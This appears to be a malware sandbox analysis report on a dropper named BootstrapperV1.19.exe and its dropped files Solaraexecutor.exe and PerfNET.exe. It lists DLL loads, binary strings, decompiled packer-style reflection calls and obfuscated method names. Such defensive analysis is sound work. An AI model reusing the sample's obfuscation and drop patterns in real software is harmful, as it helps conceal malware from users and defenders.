Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll

Source: C:\Users\user\Desktop\BootstrapperV1.19.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: BootstrapperV1.19.exe

Static file information: File size 3247616 > 1048576

Source: BootstrapperV1.19.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x316c00

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: BootstrapperV1.19.exe
Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Xml.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.pdb` source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.pdb[ source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbX source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE455000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5022.tmp.dmp.7.dr
Source:	Binary string: em.pdb3s[ source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER5022.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.PDB4y source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.pdb source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp, WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.pdbH source: WER5022.tmp.dmp.7.dr
Source:	Binary string: mscorlib.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Core.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Runtime.Serialization.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Runtime.Serialization.pdbMZ source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	.Net Code: Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777245)),Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777259))})
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	.Net Code: Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777245)),Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777259))})

.NET source code contains potential unpacker

Source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

File created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\__tmp_rar_sfx_access_check_4335062

Jump to behavior

Source: Solaraexecutor.exe.0.dr

Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B8060F6 push esp; ret	1_2_00007FFD9B806139
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B805909 push edx; retf	1_2_00007FFD9B8059DB
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B805948 push edx; retf	1_2_00007FFD9B8059DB
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B8046D8 push esp; retf	1_2_00007FFD9B8046D9
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B801ED0 push esp; ret	1_2_00007FFD9B806139
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D3F640 push ecx; ret	3_2_00D3F653
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D3EB78 push eax; ret	3_2_00D3EB96
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BAB5367 push eax; ret	13_2_00007FFD9BAB5373
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BAB3BBE push ds; retf	13_2_00007FFD9BAB3BBF
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BC124D1 push ebx; retf	13_2_00007FFD9BC124D2
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BC120D2 push edx; iretd	13_2_00007FFD9BC120D3
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEAE352 push edx; ret	13_2_00007FFD9BEAE35F
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEA62C5 push ebp; ret	13_2_00007FFD9BEA62C8
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEAE194 push edx; ret	13_2_00007FFD9BEAE1A4
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEAD957 pushad ; ret	13_2_00007FFD9BEAD958
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEADF6C push esp; ret	13_2_00007FFD9BEADF79
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEAE5B0 push esp; ret	13_2_00007FFD9BEAE5B1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEAE527 push eax; ret	13_2_00007FFD9BEAE52E
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEAD500 pushad ; ret	13_2_00007FFD9BEAD501
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEAE470 push ecx; ret	13_2_00007FFD9BEAE474

Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, bFs94RCKTmRTLfvTG3K.cs	High entropy of concatenated method names: 'syOdlHiKwqQ', 'iOxCBNnObh', 'JnnCUeJaSJ', 'dfgCWKg0c8', 'TsO1gUdD3VKcAhIXq43N', 'd1BroZdDmCrkfjQFKOhZ', 'z3t6NWdDCVpS46eU18yT', 'BQufhadDVjKA6wjDOMqO', 'iLwxgTdD5dWCpswqqwlU', 'S0rZJodDEh5guqVAL4Sc'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Ms4tXKtiAVq9fuUYxX.cs	High entropy of concatenated method names: 'eMesUxePU', 'T1V4rLd80BcJcysQZZiB', 'tFlb8Kd8Yda0KlG8tdlo', 'OlCLRKd8T7H89xmfRNih', 'uUSRkVf9Q', 'YN7j7hhgy', 'boyykytcM', 'cCZIRkKJW', 'PQFpJ3oV7', 'A4ueTIuOy'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, sgLoBqGshEXy1Bx3cN7.cs	High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'SsadJPFdr5t', 'hVJG3q8Gjw', 'imethod_0', 'xWfXlTdTA7PIgH4SjcLq', 'QDcaTrdTKaunC9s3pYiK', 'El1RvydTOWAH7r0tidBN', 'UEEEtfdTB5eyUrHAwpnl'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, zpB7r3YxvuslBboFAc8.cs	High entropy of concatenated method names: 'OCJTiv9xyD', 'diUTdhO81g', 'Yd7', 'ndwTwZH6n1', 'iTGT2vc48L', 'mdCTJUAXps', 'O7aTGBIYxa', 'Neu9pidrdLn5dd9voMGs', 'AJ8V8qdWzPrKb8TtGZai', 'LQkjmvdriliDl049AgLb'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, eP5Gv2cHImrxAnL3beH.cs	High entropy of concatenated method names: 'CZxcTJlFY1', 'IboL1ud0ExiHTkZfMfay', 'riwKxRd0VCXfLg9P9Qxl', 'VwwuFKd05DoVWbrJ2mYD', 'lJQifxd09c8c3THJcsyC', 'b9B97Jd0APVVYbVTTcIv', 'E94', 'P9X', 'vmethod_0', 'JNIdJjKHMW8'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, eZAYLEG63BEuMY8eQfC.cs	High entropy of concatenated method names: 'l6uGgbYjsy', 'is2G7o7USQ', 'Ld7GZpvV9l', 'vHZvxEdT59W2tCQ8lqfY', 'gjXdN7dTEoS2ewTg0LFs', 'CIgbKidTCj9E0sLS0K0J', 'jSuTjZdTVqbyODnImhlO', 'HJnGeKTyC1', 'HiTGHomcfl', 'AJ0XA6dT31RP2sFKPokZ'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, K3vnDkkRZna5ntOkLOT.cs	High entropy of concatenated method names: 'Xkpk7IZlEw', 'IryYl9d4EFaCidN1ppfs', 'L4xLcnd49VAqwKb75IrJ', 'kHw34Wd4VeM6X8TptOEG', 'AtHAWVd45RGxwiH90bdK', 'dpmgJXd4AeKJRGyErOq2', 'U4fUr0d4KmfS4NXTICJk', 'M8BkyCjQYw', 'VpKkISVVaD', 'fiNkpYqtgc'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, SiHSKVFplvOFL7lSn7L.cs	High entropy of concatenated method names: 'RgpRvo39yP', 'QtTRhbLFlr', 'C4Wpv1dVD3PRr5yMO6TA', 'FND8uKdVoLElyRHeVNn7', 'LoqhRxdV1G9GdhcNswIB', 'PY2xY6dVLayQwYwEG0bl', 'C25XcfdVNikpGwq3Pyff', 'dIWRREhF3T', 'lgTXM0dVxPgjOFKZrbmw', 'FeVhaodVQQNmHeN4ixa0'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Iyf8nVlIVwjNu2TmlXo.cs	High entropy of concatenated method names: 'gGIlesATqH', 'PH1rfCdsVsfj5F5tRdBp', 'mEGcE8ds5G0PWjrYKshH', 'oMEBBhdsERlTag97Se0C', 'F4OFCYds9nFZEeSGwb2m', 'yPhNApdsAFCQu3NWQbSf', 'ocqO7Wdsmjxx9SKnVT90', 'S0GpLLdsCycKp5wrRkaM', 'wJoZUjdsKPvnGQUJBmS6'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, XZnPSqdhCwxGeOaoYyA.cs	High entropy of concatenated method names: 'NuGd6UVgKD', 'zoFdbW5Nks', 'D2gdtTcvlG', 'tkb9dwdgu0M3P8FPtu7D', 'rJPMAYdgR16AbGC22qEe', 'wuWBX5dgjSCXD9V5vAsc', 'Ns2gcrdgyHNHLIxHIo9j', 'a473SUdgI8KA3DbBZx3S'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, wUwAQUGoZtL37YjvxI3.cs	High entropy of concatenated method names: 'e93GQOl3pd', 'YEfGaIJk6B', 'PbPGxu34lh', 'HI6GzDCC2Q', 'R4gciQJo4Q', 'EhScdegriD', 'feHcwTLGES', 'FREhSod06ALPoNJZmsrT', 'zBChvkd0bjNf2Per2FuM', 'siP5a1d0hsliDjG4TA1P'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, ByL6IQVXXZrh0SceR8N.cs	High entropy of concatenated method names: 'IH4Va7EDwy', 'wCxVxC7wsj', 'MBpVzCjth6', 'VEv5iHJUwP', 'NJq5dmATvi', 'WcS5wHSc6m', 'Ngw52OBmPO', 'g7O5JEHSrw', 'gSl5GLncfZ', 'uh25cc8wSj'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, pEpn0Uydwuhg28FHsex.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'oUDdlR3B7db', 'geLdlj3uASA', 'yTLPOndEOpow0M6lSsVC', 'fAqiHedEBAagGMZdH7RW', 'jr6wvkdEUKJRivyYwj3J', 'oSshgddEW9oaLF5paVgU', 'BhIPRsdErx3NK2LY2ncW', 'TL57P6dEoqRJfUUJtms1'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, orrItn7OSYL3BKHpDGE.cs	High entropy of concatenated method names: 'akM7UgEIIF', 'rwm7WFDu03', 'VhV7rNKsDX', 'tQx7yjdBBEgu4k2eMm0q', 'fC8x8hdBKGqyfuOHXUUH', 'xt2TuYdBOgXiHUJt8sZI', 'bsgIYRdBUVC7oITpQ1tJ', 'c39EixdBW0d8DdRbUWnx', 'MdIao8dBr7pftZ5dq2uv', 'e4VDGTdBo3CdDM8b3xGt'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, FYX4aOlGSdRD5CQq1v7.cs	High entropy of concatenated method names: 'O3I', 'P9X', 'C61dJSpTZUK', 'vmethod_0', 'imethod_0', 't6ZXqydsF124HgiQFa0x', 'XNXRrGdsvmU8Oi53cOt2', 'VnKuRxdsh1o30f94APJr', 'JoTnQPds6dvShYEAd9kf', 'YQskXKdsb4SrgvwvBa5Y'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, aydgOIZ5uyteP8hL0rI.cs	High entropy of concatenated method names: 'DeCZ91ePSp', 'ymbZAbfiGu', 'kAGZK22Cf5', 'uYYZOPF4GK', 'd8sZBYpTbh', 'oSKZUBVjf7', 'JmaZWSE7B2', 'sAVZrbOGiE', 'u5qZogqE1l', 'uISZ15FqsL'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, EfXDmijhlMXXi1yjthp.cs	High entropy of concatenated method names: 'pAJjjivhCs', 'FgKeV3d5xWA4OU3nKlsI', 'm9Ac6wd5zU8Mp5kveJKH', 'RxWQEAd5QYtx3V5kBmGH', 'dwtq9rd5aDw6dXn84Wpv', 'fyY8ajdEi2ZWCxIq9fIH', 'CVMj6UYp9Z', 'Se2rH8d5oM4AdGC5mNq8', 'cdHVdAd51nYPcnlBTH02', 'OOZOSFd5Dk6x7Pvrkdsy'
